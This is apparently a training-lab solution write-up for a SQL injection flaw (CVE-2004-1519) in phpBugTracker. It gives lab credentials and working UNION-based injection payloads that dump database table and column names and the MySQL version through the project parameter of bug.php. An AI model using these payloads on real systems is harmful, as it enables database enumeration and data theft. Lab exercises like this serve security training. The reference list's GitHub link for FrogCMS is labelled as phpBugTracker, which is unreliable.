phpBugTracker SQL injection CVE-2004-1519
phpBugTracker SQL injection CVE-2004-1519
URL https://www.attackdefense.com/challengedetails?cid=376
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Solution:
The exploit db link contains the steps to be followed to exploit the vulnerability.
Credentials:
● Email: [email protected]
● Password: password
URL: http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/index.php
Admin Dashboard:
URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1
Step 5: Inject the payload to dump the database.
Payload: 1'
union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)wh
ere(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+
URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1%27%20union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.c
olumns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+
Payload: 1%27%20union+select+version()+--+
URL:
http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=
1%27%20union+select+version()+--+
The SQL injection attack was successful and as a result, the MySQL version information was
dumped on the webpage.
References:
1. phpBugTracker (https://github.com/philippe/FrogCMS)
2. CVE-2004-1519 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519)
3. phpBugTracker 1.6.0 - Multiple Vulnerabilities
(https://www.exploit-db.com/exploits/36160)